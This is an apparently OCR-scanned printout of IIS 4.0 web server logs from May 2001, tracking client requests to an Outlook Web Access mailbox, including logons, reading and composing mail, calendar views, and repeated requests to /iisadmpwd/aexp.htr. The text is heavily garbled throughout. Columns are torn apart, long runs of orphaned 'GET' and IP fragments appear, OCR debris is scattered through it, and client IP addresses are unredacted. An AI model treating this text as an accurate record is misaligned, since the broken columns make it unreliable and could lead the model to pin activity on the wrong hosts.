/exchange/USA/images/sent_itm.gif 200 
/exchange/USA/inbox/peerfldr.asp 200 
/exchange/USA/inbox/title.asp 200 
/exchange/USA/inbox/messages.asp 200 


/exchange/USA/forms/IPM/NOTE/frmRoot.asp 302 


17:40 
200 
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/exchange/USA/forms/IPM/NOTE/read.asp 


/exchange/USA/images/divider.gif 304 
/exchange/USA/forms/reply.gif 200 
/exchange/USA/forms/replyall.gif 200 
/exchange/USA/forms/ReplyFld.gif 200 
/exchange/USA/forms/movepy.gif 200 
/exchange/USA/forms/forward.gif 200 
/exchange/USA/forms/prevmsg.gif 200 
/exchange/USA/forms/delmark.gif 200 
/exchange/USA/images/help.gif 304 
/exchange/USA/Attach/generic.gif 200 
/exchange/USA/forms/nextmsg.gif 200 
/exchange/USA/inbox/peerfldr.asp 200 
/exchange/USA/inbox/title.asp 200 
/exchange/USA/inbox/messages.asp 200 
/exchange/USA/images/upone.gif 304 
/exchange/USA/images/folder.gif 304 
/exchange/USA/images/divider.gif 304 


GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 


/exchange/USA/images/newmail.gif 304 
/exchange/USA/images/newpost.gif 304 
/exchange/USA/images/refresh.gif 304 
/exchange/USA/images/movepy.gif 304 
/exchange/USA/images/delmsg.gif 304 
/exchange/USA/images/newfoldr.gif 304 
/exchange/USA/images/delfoldr.gif 304 
/exchange/USA/images/empfldr.gif 304 
/exchange/USA/images/mffav.gif 304 
/exchange/USA/images/arwtanlf.gif 304 
/exchange/USA/images/arwtanrt.gif 304 
/exchange/USA/images/help.gif 304 
/exchange/USA/images/mark.gif 304 
/exchange/USA/inbox/urgent.gif 304 
/exchange/USA/inbox/envelope.gif 304 
/exchange/USA/inbox/papclip.gif 304 
/exchange/USA/images/envelope.gif 304 
/exchange/USA/images/papclip.gif 304 
/exchange/USA/root.asp 200 
/exchange/USA/Navbar/nbInbox.asp 200 
/exchange/USA/inbox/main_fr.asp 200 
/exchange/USA/Navbar/inbox.gif 304 
/exchange/USA/Navbar/cal.gif 304 
/exchange/USA/Navbar/finduser.gif 304 
/exchange/USA/inbox/title.asp 200 
/exchange/USA/Navbar/public.gif 304 
/exchange/USA/inbox/peerfldr.asp 200 
/exchange/USA/inbox/messages.asp 200 
/exchange/USA/inbox/commands.asp 200 
/exchange/USA/Navbar/option.gif 304 
/exchange/USA/Navbar/logoff.gif 304 
/exchange/USA/images/divider.gif 304 
/exchange/USA/images/newmail.gif 304 
/exchange/USA/images/newpost.gif 304 
/exchange/USA/images/refresh.gif 304 
/exchange/USA/images/movepy.gif 304 
/exchange/USA/images/delmsg.gif 304 
/exchange/USA/images/newfoldr.gif 304 
/exchange/USA/images/delfoldr.gif 304 
/exchange/USA/images/empfldr.gif 304 
/exchange/USA/images/mffav.gif 304 
/exchange/USA/images/arwtanlf.gif 304 
/exchange/USA/images/arwtanrt.gif 304 
/exchange/USA/images/help.gif 304 
/exchange/USA/images/upone.gif 304 
/exchange/USA/images/inbox.gif 304 
/exchange/USA/images/folder.gif 304 
/exchange/USA/images/mark.gif 304 
/exchange/USA/inbox/urgent.gif 304 
/exchange/USA/inbox/envelope.gif 304 
/exchange/USA/images/envelope.gif 304 
/exchange/USA/inbox/papclip.gif 304 
/exchange/USA/inbox/commands.asp 200 
/exchange/USA/images/papclip.gif 304 


24.30.89.109 GET 
24.30.89.109 GET 
24.30.89.109 GET 
24.30.89.109 GET 
24.30.89.109 GET 
24.30.89.109 GET 
24.30.89.109 GET 
24.30.89.109 GET 
24.30.89.109 GET 
24.30.89.109 GET 
24.30.89.109 GET 
24.30.89.109 GET 
24.30.89.109 GET 
24.30.89.109 GET 
24.30.89.109 GET 
24.30.89.109 GET 


134.121.3. 


-57 GET 
-57 GET 
-57 GET 
-57 GET 
.57 GET 
-57 GET 
.57 GET 
.57 GET 
-57 GET 
-57 GET 
-57 GET 
-57 GET 
-57 GET 
-57 GET 
-57 GET 
-57 GET 
-57 GET 
-57 GET 
-57 GET 
.57 GET 
.57 GET 
.57 GET 
.57 GET 
-57 GET 
.57 GET 
-57 GET 
-57 GET 
-57 GET 
.57 GET 
.57 GET 
.57 GET 
-57 GET 
-57 GET 
-57 GET 
-57 GET 
.179 GET /exchange/USA/logon.asp 200 


/exchange/USA/inbox/peerfldr.asp 200 
/exchange/USA/inbox/title.asp 200 
/exchange/USA/inbox/messages.asp 200 
/exchange/USA/images/mailbox.gif 304 
/exchange/USA/images/calendar.gif 304 
/exchange/USA/images/deleted.gif 304 
/exchange/USA/images/outbox.gif 304 
/exchange/USA/inbox/commands.asp 200 
/exchange/USA/images/sent_itm.gif 304 
/exchange/USA/inbox/peerfldr.asp 200 
/exchange/USA/inbox/title.asp 200 
/exchange/USA/inbox/messages.asp 200 
/exchange/USA/inbox/commands.asp 200 
/exchange/USA/inbox/peerfldr.asp 200 
/exchange/USA/inbox/title.asp 200 
/exchange/USA/inbox/messages.asp 200 
/exchange/USA/Default.htm 200 
/exchange/USA/logon.asp 200 
/exchange/USA/back.jpg 200 
/exchange/USA/partl.gif 200 
/exchange/USA/LogonFrm.asp 401 
/iisadmpwd/aexp.htr 200 
/exchange/USA/part2.gif 200 
/exchange/USA/msie.gif 200 
/exchange/USA/msprod.gif 200 
/iisadmpwd/aexp.htr 200 
/iisadmpwd/aexp.htr 200 
/iisadmpwd/aexp.htr 200 
/iisadmpwd/aexp.htr 200 
/iisadmpwd/aexp.htr 200 
/exchange/USA/Default .htm 200 
/exchange/USA/logon.asp 200 
/exchange/USA/msprod.gif 200 
/exchange/USA/LogonFrm.asp 401 
/exchange/USA/partl.gif 200 
/iisadmpwd/aexp.htr 200 
/exchange/USA/back.jpg 200 
/iisadmpwd/aexp.htr 200 
/exchange/USA/msie.gif 200 
/iisadmpwd/aexp.htr 200 
/exchange/USA/part2.gif 200 
/iisadmpwd/aexp.htr 200 
/iisadmpwd/aexp.htr 200 
/iisadmpwd/aexp.htr 200 
/iisadmpwd/aexp.htr 200 
/iisadmpwd/aexp.htr 200 
/iisadmpwd/aexp.htr 200 
/iisadmpwd/aexp.htr 200 
/iisadmpwd/aexp.htr 200 
/iisadmpwd/aexp.htr 200 
/iisadmpwd/aexp.htr 200 


179 GET /exchange/USA/back.jpg 200 
179 GET /exchange/USA/partl.gif 200 


22 


22: 


:02 


2:31 


:31 
2:31 


134. 


134 
134 
134 


134. 
134. 


134 
134 
134 


134. 


134 
134 
134 
134 
134 
134 
134 
134 
134 


134 
134 
134 
134 


134 
134 
134 


134. 


134 
134 
134 
134 
134 
134 


134. 


134 
134 
134 


134. 


134 


134. 


134 


134. 


134 


134. 


134 


134. 


121. 
121. 
121. 
.121. 
121. 
121. 
pds 
121. 
121. 
nipesa 
121. 
121. 
L121. 
121. 
121. 
121. 
121. 
121. 
: : 121. 
/exchange/USA/for 
134.121. 
121. 
121. 
121. 
»L2d, 


-121. 
-121. 
-121. 
121. 
~121. 
~121. 
.121. 
-121. 
.121. 
~121. 
121. 
-121. 
2121s 
-121. 
121. 
-121. 
121. 
-121. 
121. 
-121. 
121. 
-121. 
121. 


WWWWWWWWWW WWW WWW WW Ww 


.179 
.179 
.179 
-179 
.179 
-179 
-179 
-179 
.179 
-179 
.179 
.179 
-179 
179 
.179 
.179 
-179 
.179 


179 


GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 


/exchange/USA/LogonFrm.asp 401 
/exchange/USA/LogonFrm.asp 302 
/exchange/USA/root.asp 200 
/exchange/USA/inbox/main_fr.asp 200 
/exchange/USA/Navbar/nbInbox.asp 200 
/exchange/USA/inbox/title.asp 200 
/exchange/USA/inbox/peerfldr.asp 200 
/exchange/USA/inbox/messages.asp 200 
/exchange/USA/inbox/commands.asp 200 
/exchange/USA/Navbar/inbox.gif 200 
/exchange/USA/Navbar/cal.gif 200 
/exchange/USA/Navbar/finduser.gif 200 
/exchange/USA/Navbar/public.gif 200 
/exchange/USA/Navbar/option.gif 200 
/exchange/USA/Navbar/logoff.gif 200 
/exchange/USA/images/upone.gif 200 
/exchange/USA/images/inbox.gif 200 
/exchange/USA/images/divider.gif 200 


ms/IPM/NOTE/frmRoot.asp 302 
-L79 
.179 
.179 
L179 
179 


Wo WW WW 


WWWWWWWWW WWW WWW WWW WWW Ww 


.179 
.179 
.179 
179 
.179 
.179 
.179 
.179 
.179 
.179 
.179 
179 
.179 
.179 
.179 
.179 
179 
.179 
179 
179 
.179 
.179 
.179 


GET 
GET 
GET 
GET 
GET 


GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 
GET 


/exchange/USA/images/newmail.gif 200 
/exchange/USA/images/newpost.gif 200 
/exchange/USA/images/refresh.gif 200 
/exchange/USA/images/movepy.gif 200 
/exchange/USA/forms/IPM/NOTE/read.asp 


/exchange/USA/images/delmsg.gif 200 
/exchange/USA/images/newfoldr.gif 200 
/exchange/USA/images/delfoldr.gif 200 
/exchange/USA/images/empfldr.gif 200 
/exchange/USA/images/mffav.gif 200 
/exchange/USA/images/arwtanlf.gif 200 
/exchange/USA/images/arwtanrt.gif 200 
/exchange/USA/images/help.gif 200 
/exchange/USA/forms/reply.gif 200 
/exchange/USA/forms/ReplyFld.gif 200 
/exchange/USA/forms/replyall.gif 200 
/exchange/USA/forms/forward.gif 200 
/exchange/USA/forms/delmark.gif 200 
/exchange/USA/forms/movepy.gif 200 
/exchange/USA/forms/prevmsg.gif 200 
/exchange/USA/forms/nextmsg.gif 200 
/exchange/USA/logoff.asp 200 
/exchange/USA/images/help.gif 200 
/exchange/USA/part1.gif 206 
/exchange/USA/back.jpg 206 
/exchange/USA/part2.gif 200 
/exchange/USA/msprod.gif 200 
/exchange/USA/msie.gif 200 


#Software: 
#Version: 
#Date: 


Microsoft Internet Information Server 4.0 
1.0 


2001-05-05 04:31:43 


#Fields: 


04: 


time c-i 
-121. 
121. 
21... 
121. 
121. 
121. 
121. 
121. 
121. 
121. 
Shae 
yE244 
~-121. 
121. 
-121. 
121. 
121. 
-121. 
121. 
121. 
-121. 
oh? 1. 
121. 
si 2d y 
-121. 
L245 
121. 
pes ol De 
121. 
eh 213 
121. 
e245 
121. 
121. 
121. 
-121. 
121. 
121. 
121. 
-121. 
121. 
121. 
L121. 
121. 
-121. 
121. 
-121. 
121. 
-121. 
121. 


134 
134 
134 


134. 


134 


134. 


134 


134. 


134 


134. 


134 
134 
134 


134. 


134 


134. 
134. 


134 
134 


134. 


134 
134 


134. 


134 
134 
134 
134 
134 
134 
134 
134 
134 
134 
134 
134 
134 
134 
134 


134. 


134 
134 
134 
134 


134. 


134 


134. 


134 
134 
134 
134 


es-method cs-uri-stem sc-status 


Pp 
3.162 
3.162 
3.162 
3.162 
3.162 
3.162 
3.162 
3.162 
3.162 
3.162 
3.162 
3.162 
3.162 
3.162 
3.162 
3.162 
3.162 
3.162 
3.162 
3.162 
3.162 
3.162 
3.162 
3.162 
3. 
3 
3 
3 
3 
3 
3 
3 
3 
3 
3 
3 
3 
3 
3 
3 
3 
3 
3 
3 
3 
3 
3 
3 
3 
3 


162 


.162 
.162 
.162 
.162 
.162 
.162 
.162 
.162 
-162 
.162 
.162 
-162 
-162 
.162 
-162 
~162 
.162 
.162 
-162 
-162 
-162 
.162 
-162 
-162 
.162 


GET /exchange/USA/logon.asp 200 

GET /exchange/USA/back.jpg 200 

GET /exchange/USA/part1l.gif 200 

GET /exchange/USA/LogonFrm.asp 401 

GET /exchange/USA/LogonFrm.asp 302 

GET /exchange/USA/root.asp 200 

GET /exchange/USA/inbox/main_fr.asp 200 
GET /exchange/USA/Navbar/nbInbox.asp 200 
GET /exchange/USA/Navbar/inbox.gif 200 
GET /exchange/USA/Navbar/cal.gif 200 

GET /exchange/USA/Navbar/finduser.gif 200 
GET /exchange/USA/Navbar/public.gif 200 
GET /exchange/USA/Navbar/option.gif 200 
GET /exchange/USA/Navbar/logoff.gif 200 
GET /exchange/USA/inbox/title.asp 200 

GET /exchange/USA/inbox/peerfldr.asp 200 
GET /exchange/USA/inbox/messages.asp 200 
GET /exchange/USA/inbox/commands.asp 200 
GET /exchange/USA/images/divider.gif 200 
GET /exchange/USA/images/newmail.gif 200 
GET /exchange/USA/images/newpost.gif 200 
GET /exchange/USA/images/refresh.gif 200 
GET /exchange/USA/images/movepy.gif 200 
GET /exchange/USA/images/delmsg.gif 200 
GET /exchange/USA/images/newfoldr.gif 200 
GET /exchange/USA/images/delfoldr.gif 200 
GET /exchange/USA/images/empfldr.gif 200 
GET /exchange/USA/images/mffav.gif 200 
GET /exchange/USA/images/arwtanlf.gif 200 
GET /exchange/USA/images/arwtanrt.gif 200 
GET /exchange/USA/images/help.gif 200 

GET /exchange/USA/images/mark.gif 200 

GET /exchange/USA/inbox/urgent.gif 200 
GET /exchange/USA/inbox/envelope.gif 200 
GET /exchange/USA/inbox/papclip.gif 200 
GET /exchange/USA/images/envelope.gif 200 
GET /éxchange/USA/images/upone.gif 200 
GET /exchange/USA/images/inbox.gif 200 
POST /exchange/USA/inbox/commands.asp 200 
GET /exchange/USA/images/papclip.gif 200 
GET /exchange/USA/inbox/commands.asp 200 
GET /exchange/USA/inbox/peerfldr.asp 200 
GET /exchange/USA/inbox/title.asp 200 

GET /exchange/USA/inbox/messages.asp 200 
POST /exchange/USA/inbox/commands.asp 200 
GET /exchange/USA/inbox/commands.asp 200 
GET /exchange/USA/inbox/peerfldr.asp 200 
GET /exchange/USA/inbox/title.asp 200 

GET /exchange/USA/inbox/messages.asp 200 
GET /exchange/USA/inbox/commands.asp 200 


134 
134 
134 
134 
134 
134 
134. 
134 
134 
134. 
134 
134 
134 
134 
134 
134 
134 
134 
134 
168. 
168. 
168 
168 
168 
168. 
168 
168 
168 
168 
168 
168. 
168 
168. 


168 
168 
168 
168 
168 
168. 
168 
168 


168 
168 


168 
168. 
168 
168 
168 
168 
168. 
168. 


-121. 
-121. 
-121. 
-121. 
-121. 
-121. 


121. 


-121. 
-121. 


121. 


-121. 
.121. 
.121. 
-121. 
-121. 
Ads 
pe ee 
2221.2 
-121. 


191. 
191. 


~191. 
.191. 
.191. 


191. 


.191. 
-191. 
-191. 
As Eo as 
-191. 


191. 


-191. 


191. 


-191. 
-191. 
a le 
eho. 
-191. 


191. 


~191. 
-191. 


Papt Fas alta 
-191. 


-191. 


191. 


-191. 
.191. 
-191. 
-191. 


191. 
191. 


WWWWWWWWW WWW WWW WWW Ww 


.162 GET 
.162 GET 
-L62 GET 
-L62 GET 
.162 GET 
.162 GET 
.162 GET 
-162 GET 
-162 GET 
.162 GET 
.162 GET 
.162 GET 
.162 GET 
.162 GET 
.162 GET 
-162 GET 
-162 GET 
-162 GET 
.162 GET 
.189 GET /exchange/USA/logon.asp 200 

.189 GET /exchange/USA/part2.gif 200 

.189 GET /exchange/USA/back.jpg 200 

.189 GET /exchange/USA/LogonFrm.asp 401 

.189 GET /exchange/USA/msie.gif 200 

.189 GET /exchange/USA/partl1.gif 200 

.189 GET /exchange/USA/LogonFrm.asp 302 

.189 GET /exchange/USA/root.asp 200 

.189 GET /exchange/USA/Navbar/nbInbox.asp 200 
.189 GET /exchange/USA/inbox/main_fr.asp 200 
.189 GET /exchange/USA/Navbar/inbox.gif 200 
.189 GET /exchange/USA/Navbar/cal.gif 200 
.189 GET /exchange/USA/inbox/title.asp 200 
.189 GET /exchange/USA/Navbar/finduser.gif 


.189 GET /exchange/USA/inbox/peerfldr.asp 200 
.189 GET /exchange/USA/Navbar/public.gif 200 

.189 GET /exchange/USA/Navbar/logoff.gif 200 

.189 GET /exchange/USA/Navbar/option.gif 200 

.189 GET /exchange/USA/images/divider.gif 200 
.189 GET /exchange/USA/images/newmail.gif 200 
.189 GET /exchange/USA/images/newpost.gif 200 
.189 GET /exchange/USA/images/delfoldr.gif 


.189 GET /exchange/USA/images/mffav.gif 200 
.189 GET /exchange/USA/images/arwtanrt.gif 


.189 GET /exchange/USA/images/upone.gif 200 
.189 GET /exchange/USA/images/refresh.gif 200 
.189 GET /exchange/USA/images/inbox.gif 200 
.189 GET /exchange/USA/images/mark.gif 200 
.189 GET /exchange/USA/inbox/flagcomp.gif 200 | 
.189 GET /exchange/USA/inbox/urgent.gif 200 | 
.189 GET /exchange/USA/images/movepy.gif 200 
.189 GET /exchange/USA/inbox/messages.asp 200 


/exchange/USA/inbox/peerfldr.asp 200 
/exchange/USA/inbox/title.asp 200 
/exchange/USA/inbox/messages.asp 200 
/exchange/USA/images/mailbox.gif 200 
/exchange/USA/images/folder.gif 200 
/exchange/USA/images/calendar.gif 200 
/exchange/USA/images/deleted.gif 200 
/exchange/USA/images/outbox.gif 200 
/exchange/USA/inbox/commands.asp 200 
/exchange/USA/inbox/peerfldr.asp 200 
/exchange/USA/inbox/title.asp 200 
/exchange/USA/inbox/messages.asp 200 
/exchange/USA/images/oof.gif 200 
/exchange/USA/logoff.asp 200 
/exchange/USA/back.jpg 206 
/exchange/USA/partl.gif 206 
/exchange/USA/msie.gif 200 
/exchange/USA/part2.gif 200 
/exchange/USA/msprod.gif 200 


16:58:08 168.191.112.189 GET /exchange/USA/inbox/commands.asp 200 
16:59:01 168.191.112.189 POST /exchange/USA/inbox/commands.asp 


16:59:01 168.191.112.189 GET /exchange/USA/images/newfoldr.gif 


16:59:01 168.191.112.189 GET /exchange/USA/inbox/commands.asp 200 
16:59:05 168.191.112.189 GET /exchange/USA/images/arwtanlf.gif 


16:59:05 168.191.112.189 GET /exchange/USA/inbox/peerfldr.asp 200 
16:59:05 168.191.112.189 GET /exchange/USA/images/delmsg.gif 200 
16:59:05 168.191.112.189 GET /exchange/USA/inbox/title.asp 200 
16:59:05 168.191.112.189 GET /exchange/USA/images/help.gif 200 
16:59:09 168.191.112.189 GET /exchange/USA/inbox/messages.asp 200 
16:59:16 168.191.112.189 GET /exchange/USA/images/empfldr.gif 200 
16:59:16 168.191.112.189 GET 
/exchange/USA/forms/IPM/NOTE/£rmRoot.asp 302 

16:59:16 168.191.112.189 GET /exchange/USA/images/papclip.gif 200 
16:59:16 168.191.112.189 GET 
/exchange/USA/forms/IPM/NOTE/read.asp 200 

16:59:16 168.191.112.189 GET /exchange/USA/inbox/papclip.gif 200 
16:59:18 168.191.112.189 GET /exchange/USA/inbox/envelope.gif 200 
16:59:18 168.191.112.189 GET /exchange/USA/images/envelope.gif 


16:59:18 168.191.112.189 GET /exchange/USA/forms/reply.gif 200 
16:59:22 168.191.112.189 GET /exchange/USA/forms/ReplyFld.gif 200 
16:59:22 168.191.112.189 GET /exchange/USA/forms/forward.gif 200 
16:59:22 168.191.112.189 GET /exchange/USA/forms/delmark.gif 200 
16:59:41 168.191.112.189 GET /exchange/USA/forms/replyall.gif 200 
16:59:41 168.191.112.189 GET 
/exchange/USA/forms/IPM/NOTE/frmRoot.asp 302 

16:59:41 168.191.112.189 GET /exchange/USA/forms/nextmsg.gif 200 
16:59:41 168.191.112.189 GET 
/exchange/USA/forms/IPM/NOTE/read.asp 200 

17:00:06 168.191.112.189 GET /exchange/USA/Attach/generic.gif 200 
17:00:06 168.191.112.189 GET 
/exchange/USA/forms/IPM/NOTE/commands.asp 200 

17:00:06 168.191.112.189 GET /exchange/USA/forms/movepy.gif 200 
17:00:06 168.191.112.189 GET 
/exchange/USA/forms/IPM/NOTE/frmRoot.asp 200 

17:00:10 168.191.112.189 GET /exchange/USA/forms/prevmsg.gif 200 
17:00:10 168.191.112.189 GET 
/exchange/USA/forms/IPM/NOTE/cmpTitle.asp 200 

17:00:10 168.191.112.189 GET 
/exchange/USA/forms/IPM/NOTE/cmpMsg.asp 200 

17:00:10 168.191.112.189 GET 
/exchange/USA/forms/IPM/NOTE/commands.asp 200 

17:00:13 168.191.112.189 GET /exchange/USA/forms/send.gif 200 
17:00:13 168.191.112.189 GET /exchange/USA/forms/save.gif 200 
17:00:13 168.191.112.189 GET /exchange/USA/forms/high.gif 200 
17:00:16 168.191.112.189 GET /exchange/USA/forms/low.gif 200 
17:00:16 168.191.112.189 GET /exchange/USA/forms/tabrcor.gif 200 
17:00:16 168.191.112.189 GET /exchange/USA/forms/tablcor.gif 200 
17:00:16 168.191.112.189 GET /exchange/USA/forms/tabrline.gif 200 
17:10:44 168.191.112.189 GET /exchange/USA/forms/tabWdot.gif 200 


. 


17:10:44 168.191.112.189 POST 
/exchange/USA/forms/IPM/NOTE/commands.asp 200 

17:10:48 168.191.112.189 GET /exchange/USA/forms/tabWdot.gif 200 
17:10:48 168.191.112.189 GET 
/exchange/USA/forms/IPM/NOTE/frmRoot.asp 302 

17:10:48 168.191.112.189 GET /exchange/USA/forms/tabWdot.gif 200 
17:10:48 168.191.112.189 GET 
/exchange/USA/forms/IPM/NOTE/read.asp 200 

17:11:10 168.191.112.189 GET /exchange/USA/forms/tabWdot.gif 200 
17:11:10 168.191.112.189 GET 
/exchange/USA/forms/IPM/NOTE/frmRoot.asp 302 

17:11:10 168.191.112.189 GET 
/exchange/USA/forms/IPM/NOTE/read.asp 200 

17:11:22 168.191.112.189 GET 
/exchange/USA/forms/IPM/NOTE/frmRoot.asp 302 

17:11:22 168.191.112.189 GET 
/exchange/USA/forms/IPM/NOTE/read.asp 200 

17:11:52 168.191.112.189 GET 
/exchange/USA/forms/IPM/NOTE/commands.asp 200 

17:11:52 168.191.112.189 GET 
/exchange/USA/forms/IPM/NOTE/frmRoot.asp 200 

17:11:55 168.191.112.189 GET 
/exchange/USA/forms/IPM/NOTE/cmpTitle.asp 200 

17:11:55 168.191.112.189 GET 
/exchange/USA/forms/IPM/NOTE/cmpMsg.asp 200 

17:11:55 168.191.112.189 GET 
/exchange/USA/forms/IPM/NOTE/commands.asp 200 

17:14:15 168.191.112.189 POST 
/exchange/USA/forms/IPM/NOTE/commands.asp 200 

17:14:24 168.191.112.189 GET 
/exchange/USA/forms/IPM/NOTE/frmRoot.asp 302 

17:14:24 168.191.112.189 GET 
/exchange/USA/forms/IPM/NOTE/read.asp 200 

17:14:44 168.191.112.189 GET 
/exchange/USA/forms/IPM/NOTE/commands.asp 200 

17:14:44 168.191.112.189 GET 
/exchange/USA/forms/IPM/NOTE/frmRoot.asp 200 

17:14:47 168.191.112.189 GET 
/exchange/USA/forms/IPM/NOTE/cmpTitle.asp 200 

17:14:47 168.191.112.189 GET 
/exchange/USA/forms/IPM/NOTE/cmpMsg.asp 200 

17:14:47 168.191.112.189 GET 
/exchange/USA/forms/IPM/NOTE/commands.asp 200 

17:15:45 168.191.112.189 POST 
/exchange/USA/forms/IPM/NOTE/commands.asp 200 

17:15:54 168.191.112.189 GET /exchange/USA/options/set.asp 200 
17:16:27 168.191.112.189 POST /exchange/USA/options/set.asp 200 
17:16:32 168.191.112.189 GET /exchange/USA/calendar/main_fr.asp 
200 

17:16:35 168.191.112.189 GET /exchange/USA/calendar/title.asp 200 
17:16:35 168.191.112.189 GET /exchange/USA/calendar/events.asp 
200 

17:16:35 168.191.112.189 GET /exchange/USA/calendar/appts.asp 200 
17:16:42 168.191.112.189 GET /exchange/USA/calendar/pick.asp 200 
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/exchange/USA/images/newappt.gif 200 
/exchange/USA/calendar/events.asp 


/exchange/USA/images/newmtg.gif 200 
/exchange/USA/calendar/appts.asp 200 
/exchange/USA/calendar/left.gif 200 
/exchange/USA/calendar/right.gif 200 


#Software: Microsoft Internet Information Server 4.0 
#Version: 1.0 

#Date: 2001-05-07 13:15:43 

#Fields: time c-ip cs-method cs-uri-stem sc-status 
13:15:43 128.100.208.135 GET /exchange/USA/Default.htm 200 
13:15:43 128.100.208.135 GET /exchange/USA/logon.asp 200 
13:15:43 128.100.208.135 GET /exchange/USA/part2.gif 200 
13:16:14 128.100.208.135 GET /exchange/USA/back.jpg 200 
13:16:14 128.100.208.135 GET /exchange/USA/LogonFrm.asp 401 
13:16:23 128.100.208.135 GET /iisadmpwd/aexp.htr 200 
13:17:41 128.100.208.135 GET /exchange/USA/partl.gif 200 
13:24:03 128.100.208.135 GET /exchange/USA/msie.gif 200 
13:30:27 128.100.208.135 GET /exchange/USA/msprod.gif 200 
13:35:44 63.146.80.30 GET /Default.htm 200 

13:35:44 63.146.80.30 GET /exchange/USA/Default .htm 304 
13:35:44 63.146.80.30 GET /exchange/USA/logon.asp 200 
13:35:44 63.146.80.30 GET /exchange/USA/back.jpg 304 
13:35:44 63.146.80.30 GET /exchange/USA/partl.gif 304 
13:35:44 63.146.80.30 GET /exchange/USA/part2.gif 304 
13:35:44 63.146.80.30 GET /exchange/USA/msie.gif 304 
13:36:45 63.146.80.30 GET /exchange/USA/msprod.gif 304 
13:50:31 63.146.80.30 GET /Default.htm 304 

14:03:50 63.146.80.20 GET /Default.htm 200 

#Software: Microsoft Internet Information Server 4.0 
#Version: 1.0 

#Date: 2001-05-07 18:07:04 

#Fields: time c-ip cs-method cs-uri-stem sc-status 
18:07:04 63.146.80.3 GET /exchange/USA/Default .htm 304 
18:07:08 63.146.80.3 GET /exchange/USA/logon.asp 200 
18:07:08 63.146.80.3 GET /exchange/USA/back.jpg 304 
18:07:08 63.146.80.3 GET /exchange/USA/part1.gif 304 
18:07:08 63.146.80.3 GET /exchange/USA/part2.gif 304 
18:08:13 63.146.80.3 GET /exchange/USA/msie.gif 304 
18:08:13 63.146.80.3 GET /exchange/USA/msprod.gif 304 
18:11:50 63.146.80.3 GET /exchange/USA/logon.asp 200 
18:11:50 63.146.80.3 GET /exchange/USA/back.jpg 304 
18:11:50 63.146.80.3 GET /exchange/USA/partl.gif 304 
18:11:50 63.146.80.3 GET /exchange/USA/part2.gif 304 
18:11:50 63.146.80.3 GET /exchange/USA/msie.gif 304 
18:12:35 63.146.80.3 GET /exchange/USA/msprod.gif 304 
18:12:35 63.146.80.3 GET /exchange/USA/logon.asp 200 
18:12:35 63.146.80.3 GET /exchange/USA/back.jpg 304 
18:12:35 63.146.80.3 GET /exchange/USA/partl.gif 304 
18:12:35 63.146.80.3 GET /exchange/USA/part2.gif 304 
18:12:35 63.146.80.3 GET /exchange/USA/msie.gif 304 
18:12:35 63.146.80.3 GET /exchange/USA/msprod.gif 304 
18:12:35 63.146.80.3 GET /exchange/USA/logon.asp 200 
18:12:35 63.146.80.3 GET /exchange/USA/back.jpg 304 
18:12:35 63.146.80.3 GET /exchange/USA/part1.gif 304 
18:12:35 63.146.80.3 GET /exchange/USA/part2.gif 304 
18:12:35 63.146.80.3 GET /exchange/USA/msie.gif 304 
18:12:50 63.146.80.3 GET /exchange/USA/msprod.gif 304 
18:12:50 63.146.80.3 GET /exchange/USA/LogonFrm.asp 401 
18:12:59 63.146.80.3 GET /exchange/USA/LogonFrm.asp 302 
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/exchange/USA/root.asp 200 
/exchange/USA/Navbar/nbInbox.asp 200 
/exchange/USA/Navbar/inbox.gif 304 
/exchange/USA/Navbar/cal.gif 304 
/exchange/USA/Navbar/finduser.gif 304 
/exchange/USA/Navbar/public.gif 304 
/exchange/USA/Navbar/option.gif 304 
/exchange/USA/inbox/main_fr.asp 200 
/exchange/USA/Navbar/logoff.gif 304 
/exchange/USA/inbox/title.asp 200 
/exchange/USA/inbox/peerfldr.asp 200 
/exchange/USA/inbox/messages.asp 200 
/exchange/USA/inbox/commands.asp 200 
/exchange/USA/images/divider.gif 304 
/exchange/USA/images/newpost.gif 304 
/exchange/USA/images/refresh.gif 304 
/exchange/USA/images/newmail.gif 304 
/exchange/USA/images/delmsg.gif 304 
/exchange/USA/images/newfoldr.gif 304 
/exchange/USA/images/movepy.gif 304 
/exchange/USA/images/empfldr.gif 304 
/exchange/USA/images/delfoldr.gif 304 
/exchange/USA/images/mffav.gif 304 
/exchange/USA/images/arwtanrt.gif 304 
/exchange/USA/images/arwtanlf.gif 304 
/exchange/USA/images/help.gif 304 
/exchange/USA/images/mark.gif 304 
/exchange/USA/inbox/envelope.gif 304 
/exchange/USA/inbox/urgent.gif 304 
/exchange/USA/inbox/papclip.gif 304 
/exchange/USA/images/envelope.gif 304 
/exchange/USA/images/upone.gif 304 
/exchange/USA/forms/IPM/NOTE/frmRoot .asp 


/exchange/USA/images/inbox.gif 304 
/exchange/USA/forms/IPM/NOTE/read.asp 


/exchange/USA/forms/reply.gif 304 
/exchange/USA/forms/replyall.gif 304 
/exchange/USA/forms/ReplyFld.gif 304 
/exchange/USA/forms/forward.gif 304 
/exchange/USA/forms/movepy.gif 304 
/exchange/USA/forms/delmark.gif 304 
/exchange/USA/forms/prevmsg.gif 304 
/exchange/USA/forms/nextmsg.gif 304 
/exchange/USA/forms/IPM/NOTE/frmRoot .asp 


/exchange/USA/forms/IPM/NOTE/read.asp 


/exchange/USA/root.asp 200 
/exchange/USA/Navbar/nbInbox.asp 200 
/exchange/USA/inbox/main_fr.asp 200 
/exchange/USA/Navbar/inbox.gif 304 
/exchange/USA/Navbar/cal.gif 304 


.146. 
-146. 
-146. 
-146. 
.146. 
-146. 
.146. 
-146. 
.146. 
-146. 
-146. 
.146. 
-146. 
.146. 
-146. 
-146. 
.146. 
-146. 
.146. 
.146. 
-146. 
.146. 
.146. 
.146. 
-146. 
-146. 
.146. 
.146. 
-146. 
.146. 
.146. 
.146. 
.146. 
.146. 
.146. 
-146. 
.146. 
-146. 
.146. 
-146. 
.146. 
.146. 
.146. 
.146. 
.146. 
.146. 
-146. 
-146. 
.146. 
.146. 
